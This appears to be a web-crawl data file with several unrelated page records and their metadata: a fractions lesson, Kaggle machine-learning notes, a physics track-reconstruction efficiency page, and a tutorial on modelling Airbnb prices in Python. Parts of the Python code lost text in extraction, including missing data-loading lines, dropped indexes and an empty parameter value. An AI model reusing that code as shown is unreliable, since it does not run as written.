Ineq. #5:\n\n Ineq. #6:\n\n Ineq. #7:\n\n Ineq. #8:\n\n Ineq. #9:\n\n Solve for:\n\n Please use this form if you would like to have this math solver on your website, free of charge. Name: Email: Your Website: Msg:\n\n# Multiplying Two Fractions Whose Numerators Are Both 1\n\nKey Idea\n\nTo multiply two fractions whose numerators are both 1, multiply the denominators and keep the numerator equal to 1.\n\nExample 1", null, "## Why Does This Procedure Work?\n\nRecall that one way to model the multiplication of two whole numbers is to draw a rectangle whose length and width are the two numbers. After dividing the rectangle into unit squares, counting the unit squares gives the product of the two whole numbers. For example, consider the product 2 × 3 modeled below.", null, "The model shows that 2 × 3 = 6. Modeling the product of two fractions is slightly different. Begin with two segments of the same length. Divide one segment into the number of equal parts indicated by the denominator of the first fraction. Divide the other segment into the number of equal parts indicated by the denominator of the second fraction. Suppose that we want to multiply", null, "and", null, ". Divide one segment into 3 equal parts and the other into 4 equal parts. Since the numerator of each fraction is 1, darken one of the parts of each segment. This is shown in the figure below.", null, "Next, we use the segments as two of the adjacent sides of a square. The marks on the segments are used to divide the square into smaller regions that are all the same size. Finally, we shade the smaller region formed by the two darkened parts of the segments.", null, "The shaded region represents the product of the fractions. It is one of the 12 regions of equal size into which the square is divided. Since each side of the square represents a length of 1, the square has an area of 1 square unit. Therefore, the shaded region represents the fraction", null, ". The model shows that", null, "." ]
[ null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/images/left_bullet.jpg", null, "https://mathmusic.org/articles_imgs/720/pic1.gif", null, "https://mathmusic.org/articles_imgs/720/pic2.gif", null, "https://mathmusic.org/articles_imgs/720/pic3.gif", null, "https://mathmusic.org/articles_imgs/720/pic4.gif", null, "https://mathmusic.org/articles_imgs/720/pic5.gif", null, "https://mathmusic.org/articles_imgs/720/pic6.gif", null, "https://mathmusic.org/articles_imgs/720/pic7.gif", null, "https://mathmusic.org/articles_imgs/720/pic8.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9027876,"math_prob":0.98898333,"size":1679,"snap":"2021-43-2021-49","text_gpt3_token_len":384,"char_repetition_ratio":0.1480597,"word_repetition_ratio":0.06,"special_character_ratio":0.2102442,"punctuation_ratio":0.09118541,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99900264,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,5,null,5,null,5,null,5,null,5,null,5,null,5,null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-19T16:12:37Z\",\"WARC-Record-ID\":\"<urn:uuid:68b0ee94-9f12-4c55-96d5-b903b9a358a4>\",\"Content-Length\":\"90497\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:85687d7f-0413-4455-93db-deca7d76294c>\",\"WARC-Concurrent-To\":\"<urn:uuid:6fa80da4-ba8a-4278-b873-3c53572fe5a1>\",\"WARC-IP-Address\":\"54.197.228.212\",\"WARC-Target-URI\":\"https://mathmusic.org/multiplying-two-fractions-whose-numerators-are-both-1.html\",\"WARC-Payload-Digest\":\"sha1:ZH22WMNZEAFVQBYJ653RQ6XQBLAGMGKU\",\"WARC-Block-Digest\":\"sha1:ZFO7D2DCEPDXYZUWMGNOR5QOI5H7NYLR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585270.40_warc_CC-MAIN-20211019140046-20211019170046-00109.warc.gz\"}"}
https://joapen.com/blog/2021/04/22/introduction-to-machine-learning-in-kaggle/
[ "# Introduction to Machine Learning in Kaggle\n\nI’m going through the course “Intro to Machine Learning“, and I would like to keep some notes about it.\n\n## My first machine learning code\n\n``````# Code you have previously used to load data\nimport pandas as pd\n\n# Path of the file to read\niowa_file_path = '../input/home-data-for-ml-course/train.csv'\n\n# Set up code checking\nfrom learntools.core import binder\nbinder.bind(globals())\nfrom learntools.machine_learning.ex3 import *\n\n# print the list of columns in the dataset to find the name of the prediction target\nhome_data.columns\n\n# Set the target (price)\ny = home_data.SalePrice\n\n# Create the list of features below\nfeature_names = ['LotArea', 'YearBuilt','1stFlrSF','2ndFlrSF','FullBath', 'BedroomAbvGr', 'TotRmsAbvGrd']\n\n# Select data corresponding to features in feature_names\nX = home_data[feature_names]\n\n# Review data\n# print description or statistics from X\nprint(X.describe)\n\n# print the top few lines\n\n#specify the model.\n#For model reproducibility, set a numeric value for random_state when specifying the model\nfrom sklearn.tree import DecisionTreeRegressor\niowa_model = DecisionTreeRegressor(random_state=1)\n\n# Fit the model\niowa_model.fit(X,y)\n\npredictions = iowa_model.predict(X)\nprint(predictions)\n\n``````\n\n## Model validation\n\nIn almost all applications, the relevant measure of model quality is predictive accuracy. In other words, will the model’s predictions be close to what actually happens.\n\nMean Absolute Error (MAE) give us the absolute value of each error.\n\n``````# Specify the model\niowa_model = DecisionTreeRegressor(random_state=1)\n\n# Fit iowa_model with the training data.\niowa_model.fit(train_X, train_y)\n\n# Predict with all validation observations\nval_predictions = iowa_model.predict(val_X)\n\n# print the top few validation predictions\nprint(val_predictions)\n\nfrom sklearn.metrics import mean_absolute_error\nval_mae = mean_absolute_error(val_y, val_predictions)\n\n# uncomment following line to see the validation_mae\nprint(val_mae)``````\n\n#### Some machine learning metrics:\n\n• Accuracy\n• Confusion Matrix\n• Area Under the ROC Curve (AUC)\n• F1 Score\n• Precision-Recall Curve\n• Log/Cross Entropy Loss\n• Mean Squared Error\n• Mean Absolute Error\n\n## Under-fitting and over-fitting\n\nModels can suffer from either:\n\n• Over fitting: capturing spurious patterns that won’t recur in the future, leading to less accurate predictions, or\n• Under fitting: failing to capture relevant patterns, again leading to less accurate predictions.\n\n## The 7 Steps of Machine Learning\n\n• Step 1: Gather the data. When participating in a Kaggle competition, this step is already completed for you.\n• Step 2: Prepare the data – Deal with missing values and categorical data. (Feature engineering is covered in a separate course.)\n• Step 4: Train the model – Fit decision trees and random forests to patterns in training data.\n• Step 5: Evaluate the model – Use a validation set to assess how well a trained model performs on unseen data.\n• Step 6: Tune parameters – Tune parameters to get better performance from XGBoost models.\n• Step 7: Get predictions – Generate predictions with a trained model and submit your results to a Kaggle competition.\n\n#### Automated machine learning (AutoML)\n\nRead how to use Google Cloud AutoML Tables to automate the machine learning process. While Kaggle has already taken care of the data collection, AutoML Tables will take care of all remaining steps." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.74576473,"math_prob":0.6829473,"size":3375,"snap":"2021-31-2021-39","text_gpt3_token_len":767,"char_repetition_ratio":0.12281222,"word_repetition_ratio":0.008281574,"special_character_ratio":0.216,"punctuation_ratio":0.11392405,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95265305,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-24T00:46:04Z\",\"WARC-Record-ID\":\"<urn:uuid:8c169f46-5604-42a0-960d-6698817000b2>\",\"Content-Length\":\"70236\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5444258d-49ae-44f3-ad6a-c0ae7d9e75f5>\",\"WARC-Concurrent-To\":\"<urn:uuid:a00bfbf2-e09f-404b-8ac1-53f09903d06c>\",\"WARC-IP-Address\":\"104.193.141.127\",\"WARC-Target-URI\":\"https://joapen.com/blog/2021/04/22/introduction-to-machine-learning-in-kaggle/\",\"WARC-Payload-Digest\":\"sha1:HRLPE2VHTVH2FFPNHLAHW5HNQ4JO6OMB\",\"WARC-Block-Digest\":\"sha1:GGZBF5Q432NPPJCDGCDCP2H7RKXYMJDU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057479.26_warc_CC-MAIN-20210923225758-20210924015758-00138.warc.gz\"}"}
https://halldweb.jlab.org/single_track/2012-02-28/
[ "Single track reconstruction\n\nYellow lines indicate recommended fiducial cuts. The vertical lines are at θ=1o and θ=130o.\n\nPion events\n\nOverall efficiency = 0.9587\nEfficiency (Prob>0.001) = 0.793996\nMomentum cut: p=0.116635 + 0.00725593 θ + -0.000143586 θ2 + 7.39252e-07 θ3", null, "", null, "", null, "", null, "", null, "Proton events\n\nOverall efficiency = 0.93759\nEfficiency (Prob>0.001) = 0.759162\nMomentum cut: p=0.444242 + -0.00195075 θ + -3.42498e-05 θ2 + 3.26844e-07 θ3", null, "", null, "", null, "", null, "", null, "" ]
[ null, "https://halldweb.jlab.org/single_track/2012-02-28/pion_prob.png", null, "https://halldweb.jlab.org/single_track/2012-02-28/pion_efficiency.png", null, "https://halldweb.jlab.org/single_track/2012-02-28/pion_efficiency_with_chi2_cut.png", null, "https://halldweb.jlab.org/single_track/2012-02-28/pion_dp_vs_theta.png", null, "https://halldweb.jlab.org/single_track/2012-02-28/pion_dp_vs_p_vs_theta.png", null, "https://halldweb.jlab.org/single_track/2012-02-28/proton_prob.png", null, "https://halldweb.jlab.org/single_track/2012-02-28/proton_efficiency.png", null, "https://halldweb.jlab.org/single_track/2012-02-28/proton_efficiency_with_chi2_cut.png", null, "https://halldweb.jlab.org/single_track/2012-02-28/proton_dp_vs_theta.png", null, "https://halldweb.jlab.org/single_track/2012-02-28/proton_dp_vs_p_vs_theta.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.62059444,"math_prob":0.9403318,"size":369,"snap":"2022-05-2022-21","text_gpt3_token_len":161,"char_repetition_ratio":0.12876712,"word_repetition_ratio":0.0,"special_character_ratio":0.55284554,"punctuation_ratio":0.21176471,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9637896,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-22T06:19:02Z\",\"WARC-Record-ID\":\"<urn:uuid:04f48c14-3a01-4202-b78e-be9a9a47d1f4>\",\"Content-Length\":\"1485\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2cce8371-668a-4026-92ee-78f239f32d5c>\",\"WARC-Concurrent-To\":\"<urn:uuid:188fb2ec-167e-4d26-bebd-259413447b37>\",\"WARC-IP-Address\":\"129.57.64.128\",\"WARC-Target-URI\":\"https://halldweb.jlab.org/single_track/2012-02-28/\",\"WARC-Payload-Digest\":\"sha1:N7CXAKAYFH7SLR6V76NLAX2WM36VNKTW\",\"WARC-Block-Digest\":\"sha1:MQGAL6GHFSMSBXQBK6DVUQT2PBIMUFLP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320303747.41_warc_CC-MAIN-20220122043216-20220122073216-00402.warc.gz\"}"}
https://www.r-bloggers.com/2018/10/modeling-airbnb-prices/
[ "Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.\n\nIn this post we’re going to model the prices of Airbnb appartments in London. In other words, the aim is to build our own price suggestion model. We will be using data from http://insideairbnb.com/ which we collected in April 2018. This work is inspired from the Airbnb price prediction model built by Dino Rodriguez, Chase Davis, and Ayomide Opeyemi. Normally we would be doing this in R but we thought we’d try our hand at Python for a change.\n\nWe present a shortened version here, but the full version is available on our GitHub.\n\n## Data Preprocessing\n\nFirst, we import the listings gathered in the csv file.\n\nimport pandas as pd\nlistings_file_path = 'listings.csv.gz'\nlistings.columns\nIndex(['id', 'listing_url', 'scrape_id', 'last_scraped', 'name', 'summary',\n'space', 'description', 'experiences_offered', 'neighborhood_overview',\n'notes', 'transit', 'access', 'interaction', 'house_rules',\n'thumbnail_url', 'medium_url', 'picture_url', 'xl_picture_url',\n'host_id', 'host_url', 'host_name', 'host_since', 'host_location',\n'host_acceptance_rate', 'host_is_superhost', 'host_thumbnail_url',\n'host_picture_url', 'host_neighbourhood', 'host_listings_count',\n'host_total_listings_count', 'host_verifications',\n'host_has_profile_pic', 'host_identity_verified', 'street',\n'neighbourhood', 'neighbourhood_cleansed',\n'neighbourhood_group_cleansed', 'city', 'state', 'zipcode', 'market',\n'smart_location', 'country_code', 'country', 'latitude', 'longitude',\n'is_location_exact', 'property_type', 'room_type', 'accommodates',\n'bathrooms', 'bedrooms', 'beds', 'bed_type', 'amenities', 'square_feet',\n'price', 'weekly_price', 'monthly_price', 'security_deposit',\n'cleaning_fee', 'guests_included', 'extra_people', 'minimum_nights',\n'maximum_nights', 'calendar_updated', 'has_availability',\n'availability_30', 'availability_60', 'availability_90',\n'availability_365', 'calendar_last_scraped', 'number_of_reviews',\n'first_review', 'last_review', 'review_scores_rating',\n'review_scores_accuracy', 'review_scores_cleanliness',\n'review_scores_checkin', 'review_scores_communication',\n'cancellation_policy', 'require_guest_profile_picture',\n'require_guest_phone_verification', 'calculated_host_listings_count',\n'reviews_per_month'],\ndtype='object')\n\nThe data has 95 columns or features. Our first step is to perform feature selection to reduce this number.\n\n### Feature selection\n\n#### Selection on Missing Data\n\nFeatures that have a high number of missing values aren’t useful for our model so we should remove them.\n\nimport matplotlib.pyplot as plt\n%matplotlib inline\n\npercentage_missing_data = listings.isnull().sum() / listings.shape\nax = percentage_missing_data.plot(kind = 'bar', color='#E35A5C', figsize = (16, 5))\nax.set_xlabel('Feature')\nax.set_ylabel('Percent Empty / NaN')\nax.set_title('Feature Emptiness')\nplt.show()\n\nAs we can see, the features neighbourhood_group_cleansedsquare_feethas_availabilitylicense and jurisdiction_names mostly have missing values. The features neighbourhoodcleaning_fee and security_deposit are more than 30% empty which is too much in our opinion. The zipcode feature also has some missing values but we can either remove these values or impute them within reasonable accuracy.\n\nuseless = ['neighbourhood', 'neighbourhood_group_cleansed', 'square_feet', 'security_deposit', 'cleaning_fee',\nlistings.drop(useless, axis=1, inplace=True)\n\n#### Selection on Sparse Categorical Features\n\nLet’s have a look at the categorical data to see the number of unique values.\n\ncategories = listings.columns[listings.dtypes == 'object']\npercentage_unique = listings[categories].nunique() / listings.shape\n\nax = percentage_unique.plot(kind = 'bar', color='#E35A5C', figsize = (16, 5))\nax.set_xlabel('Feature')\nax.set_ylabel('Percent # Unique')\nax.set_title('Feature Emptiness')\nplt.show()\n\nWe can see that the street and amenities features have a large number of unique values. It would require some natural language processing to properly wrangle these into useful features. We believe we have enough location information with neighbourhood_cleansed and zipcode so we’ll remove street. We also remove amenitiescalendar_updated and calendar_last_updated features as these are too complicated to process for the moment.\n\nto_drop = ['street', 'amenities', 'calendar_last_scraped', 'calendar_updated']\nlistings.drop(to_drop, axis=1, inplace=True)\n\nNow, let’s have a look at the zipcode feature. The above visualisation shows us that there are lots of different postcodes, maybe too many?\n\nprint(\"Number of Zipcodes:\", listings['zipcode'].nunique())\nNumber of Zipcodes: 24774\n\nIndeed, there are too many zipcodes. If we leave this feature as is it might cause overfitting. Instead, we can regroup the postcodes. At the moment, they are separated as in the following example: KT1 1PE. We’ll keep the first part of the zipcode (e.g. KT1) and accept that this gives us some less precise location information.\n\nlistings['zipcode'] = listings['zipcode'].str.slice(0,3)\nlistings['zipcode'] = listings['zipcode'].fillna(\"OTHER\")\nprint(\"Number of Zipcodes:\", listings['zipcode'].nunique())\nNumber of Zipcodes: 461\n\nA lot of zipcodes contain less than 100 apartments and a few zipcodes contain most of the apartments. Let’s keep these ones.\n\nrelevant_zipcodes = count_per_zipcode[count_per_zipcode > 100].index\nlistings_zip_filtered = listings[listings['zipcode'].isin(relevant_zipcodes)]\n\n# Plot new zipcodes distribution\ncount_per_zipcode = listings_zip_filtered['zipcode'].value_counts()\nax = count_per_zipcode.plot(kind='bar', figsize = (22,4), color = '#E35A5C', alpha = 0.85)\nax.set_title(\"Zipcodes by Number of Listings\")\nax.set_xlabel(\"Zipcode\")\nax.set_ylabel(\"# of Listings\")\n\nplt.show()\n\nprint('Number of entries removed: ', listings.shape - listings_zip_filtered.shape)\nNumber of entries removed: 5484\n\nThis distribution is much better, and we only removed 5484 rows from our dataframe which contained about 53904 rows.\n\n#### Selection on Correlated Features\n\nNext we look at correlations.\n\nimport numpy as np\nfrom sklearn import preprocessing\n\n# Function to label encode categorical variables.\n# Input: array (array of values)\n# Output: array (array of encoded values)\ndef encode_categorical(array):\nif not array.dtype == np.dtype('float64'):\nreturn preprocessing.LabelEncoder().fit_transform(array)\nelse:\nreturn array\n\n# Temporary dataframe\ntemp_data = listings_neighborhood_filtered.copy()\n\n# Delete additional entries with NaN values\ntemp_data = temp_data.dropna(axis=0)\n\n# Encode categorical data\ntemp_data = temp_data.apply(encode_categorical)\n# Compute matrix of correlation coefficients\ncorr_matrix = temp_data.corr()\n# Display heat map\nplt.figure(figsize=(7, 7))\nplt.pcolor(corr_matrix, cmap='RdBu')\nplt.xlabel('Predictor Index')\nplt.ylabel('Predictor Index')\nplt.title('Heatmap of Correlation Matrix')\nplt.colorbar()\n\nplt.show()\n\nThis reveals that calculated_host_listings_count is highly correlated with host_total_listings_count so we’ll keep the latter. We also see that the availability_* variables are correlated with each other. We’ll keep availability_365 as this one is less correlated with other variables. Finally, we decide to drop requires_license which has an odd correlation result of NA’s which will not be useful in our model.\n\nuseless = ['calculated_host_listings_count', 'availability_30', 'availability_60', 'availability_90', 'requires_license']\nlistings_processed = listings_neighborhood_filtered.drop(useless, axis=1)\n\n### Data Splitting: Features / labels – Training set / testing set\n\nNow we split into features and labels and training and testing sets. We also convert the train and test dataframe into numpy arrays so that they can be used to train and test the models.\n\n# Shuffle the data to ensure a good distribution for the training and testing sets\nfrom sklearn.utils import shuffle\nlistings_processed = shuffle(listings_processed)\n\n# Extract features and labels\ny = listings_processed['price']\nX = listings_processed.drop('price', axis = 1)\n\n# Training and Testing Sets\nfrom sklearn.model_selection import train_test_split\ntrain_X, test_X, train_y, test_y = train_test_split(X, y, random_state = 0)\n\ntrain_X = np.array(train_X)\ntest_X = np.array(test_X)\ntrain_y = np.array(train_y)\ntest_y = np.array(test_y)\n\ntrain_X.shape, test_X.shape\n((36185, 170), (12062, 170))\n\n## Modelling\n\nNow that the data preprocessing is over, we can start the second part of this work: applying different Machine Learning models. We decided to apply 3 different models:\n\n• Random Forest, with the RandomForestRegressor from the Scikit-learn library\n• Gradient Boosting method, with the XGBRegressor from the XGBoost library\n• Neural Network, with the MLPRegressor from the Scikit-learn library.\n\nEach time, we applied the model with its default hyperparameters and we then tuned the model in order to get the best hyperparameters. The metrics we use to evaluate the models are the median absolute error due to the presence of extreme outliers and skewness in the data set.\n\nWe only show the code the Random Forest here, for the rest of the code please see the full version of this blogpost on our GitHub.\n\n### Application of the Random Forest Regressor\n\n#### With default hyperparameters\n\nWe first create a pipeline that imputes the missing values then scales the data and finally applies the model. We then fit this pipeline to the training set.\n\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import Imputer\nfrom sklearn.preprocessing import StandardScaler\n\n# Create the pipeline (imputer + scaler + regressor)\nmy_pipeline_RF = make_pipeline(Imputer(), StandardScaler(),\nRandomForestRegressor(random_state=42))\n\n# Fit the model\nmy_pipeline_RF.fit(train_X, train_y)\n\nWe evaluate this model on the test set, using the median absolute error to measure the performance of the model. We’ll also include the root-mean-square error (RMSE) for completeness. Since we’ll be doing this repeatedly it is good practice to create a function.\n\nfrom sklearn.metrics import median_absolute_error\nfrom sklearn.metrics import mean_squared_error\nfrom math import sqrt\n\ndef evaluate_model(model, predict_set, evaluate_set):\npredictions = model.predict(predict_set)\nprint(\"Median Absolute Error: \" + str(round(median_absolute_error(predictions, evaluate_set), 2)))\nRMSE = round(sqrt(mean_squared_error(predictions, evaluate_set)), 2)\nprint(\"RMSE: \" + str(RMSE))\nevaluate_model(my_pipeline_RF, test_X, test_y)\nMedian Absolute Error: 14.2\nRMSE: 126.16\n\n#### Hyperparameters tuning\n\nWe had some good results with the default hyperparameters of the Random Forest regressor. But we can improve the results with some hyperparameter tuning. There are two main methods available for this:\n\n• Random search\n• Grid search\n\nYou have to provide a parameter grid to these methods. Then, they both try different combinations of parameters within the grid you provided. But the first one only tries several combinations whereas the second one tries all the possible combinations with the grid you provided.\n\nWe started with a random search to roughly evaluate a good combination of parameters. Once this is complete, we use the grid search to get more precise results.\n\n##### Randomized Search with Cross Validation\nimport numpy as np\n\n# Number of trees in random forest\nn_estimators = [int(x) for x in np.linspace(start = 10, stop = 1000, num = 11)]\n# Number of features to consider at every split\nmax_features = ['auto', 'sqrt']\n# Maximum number of levels in tree\nmax_depth = [int(x) for x in np.linspace(10, 110, num = 5)]\nmax_depth.append(None)\n# Minimum number of samples required to split a node\nmin_samples_split = [2, 5, 10]\n# Minimum number of samples required at each leaf node\nmin_samples_leaf = [1, 2, 4]\n# Method of selecting samples for training each tree\nbootstrap = [True, False]\n# Create the random grid\nrandom_grid = {'randomforestregressor__n_estimators': n_estimators,\n'randomforestregressor__max_features': max_features,\n'randomforestregressor__max_depth': max_depth,\n'randomforestregressor__min_samples_split': min_samples_split,\n'randomforestregressor__min_samples_leaf': min_samples_leaf,\n'randomforestregressor__bootstrap': bootstrap}\n# Use the random grid to search for best hyperparameters\nfrom sklearn.model_selection import RandomizedSearchCV\n\n# Random search of parameters, using 2 fold cross validation,\n# search across 100 different combinations, and use all available cores\nrf_random = RandomizedSearchCV(estimator = my_pipeline_RF,\nparam_distributions = random_grid,\nn_iter = 50, cv = 2, verbose=2,\nrandom_state = 42, n_jobs = -1,\nscoring = 'neg_median_absolute_error')\n# Fit our model\nrf_random.fit(train_X, train_y)\n\nrf_random.best_params_\n{'randomforestregressor__bootstrap': True,\n'randomforestregressor__max_depth': 35,\n'randomforestregressor__max_features': 'auto',\n'randomforestregressor__min_samples_leaf': 2,\n'randomforestregressor__min_samples_split': 5,\n'randomforestregressor__n_estimators': 1000}\n##### Grid Search with Cross Validation\nfrom sklearn.model_selection import GridSearchCV\n# Create the parameter grid based on the results of random search\nparam_grid = {\n'randomforestregressor__bootstrap': [True],\n'randomforestregressor__max_depth': [30, 35, 40],\n'randomforestregressor__max_features': ['auto'],\n'randomforestregressor__min_samples_leaf': ,\n'randomforestregressor__min_samples_split': [4, 5, 6],\n'randomforestregressor__n_estimators': [950, 1000, 1050]\n}\n\n# Instantiate the grid search model\ngrid_search = GridSearchCV(estimator = my_pipeline_RF,\nparam_grid = param_grid,\ncv = 3, n_jobs = -1, verbose = 2,\nscoring = 'neg_median_absolute_error')\n\n# Fit the grid search to the data\ngrid_search.fit(train_X, train_y)\n\ngrid_search.best_params_\n{'randomforestregressor__bootstrap': True,\n'randomforestregressor__max_depth': 30,\n'randomforestregressor__max_features': 'auto',\n'randomforestregressor__min_samples_leaf': 2,\n'randomforestregressor__min_samples_split': 4,\n'randomforestregressor__n_estimators': 1050}\n##### Final Model\n# Create the pipeline (imputer + scaler + regressor)\nmy_pipeline_RF_grid = make_pipeline(Imputer(), StandardScaler(),\nRandomForestRegressor(random_state=42,\nbootstrap = True,\nmax_depth = 30,\nmax_features = 'auto',\nmin_samples_leaf = 2,\nmin_samples_split = 4,\nn_estimators = 1050))\n\n# Fit the model\nmy_pipeline_RF_grid.fit(train_X, train_y)\n\nevaluate_model(my_pipeline_RF_grid, test_X, test_y)\nMedian Absolute Error: 13.57\nRMSE: 125.04\n\nWe get better results with the tuned model than with default hyperparameters, but the improvement of the median absolute error is not amazing. Maybe we will have better precision if we use another model.\n\n### Visualisation of all models’ performance\n\nThe tuned Random Forest and XGBoost gave the best results on the test set. Surprisingly, the Multi Layer Perceptron with default parameters gave the highest Median Absolute errors, and the tuned one did not even give better results than the default Random Forest. This is unusual, maybe the Multi Layer Perceptron needs more data to perform better, or it might need more tuning on important hyperparameters such as the hidden_layer_sizes.\n\n## Conclusion\n\nIn this post, we modelled Airbnb apartment prices using descriptive data from the Airbnb website. First, we preprocessed the data to remove any redundant features and reduce the sparsity of the data. Then we applied three different algorithms, initially with default parameters which we then tuned. In our results the tuned Random Forest and tuned XGBoost performed best.\n\nTo further improve our models we could include more feature engineering, for example, time-based features. We could also try more extensive hyperparameter tuning. If you would like to give it a go yourself, the code and data for this post can be found on GitHub" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6649323,"math_prob":0.8328516,"size":6345,"snap":"2021-31-2021-39","text_gpt3_token_len":1522,"char_repetition_ratio":0.13278663,"word_repetition_ratio":0.0259366,"special_character_ratio":0.25263986,"punctuation_ratio":0.22626263,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96584207,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-24T06:41:52Z\",\"WARC-Record-ID\":\"<urn:uuid:819aa072-02f5-46dc-863e-e1dd8072c40e>\",\"Content-Length\":\"128965\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:236b9893-e0ec-48ed-84c2-c64e05242986>\",\"WARC-Concurrent-To\":\"<urn:uuid:fe4e35e7-df8b-42dd-9930-0df985d20adb>\",\"WARC-IP-Address\":\"172.64.134.34\",\"WARC-Target-URI\":\"https://www.r-bloggers.com/2018/10/modeling-airbnb-prices/\",\"WARC-Payload-Digest\":\"sha1:PXBQKPJ3FWA6O5IUUS36DKNUN2LDIHTQ\",\"WARC-Block-Digest\":\"sha1:5PHGKI2ZRHRQ43NYGMYNH27IQV2FTIDI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057504.60_warc_CC-MAIN-20210924050055-20210924080055-00537.warc.gz\"}"}
https://seniorsecondary.tki.org.nz/Mathematics-and-statistics/Glossary/Glossary-page-C
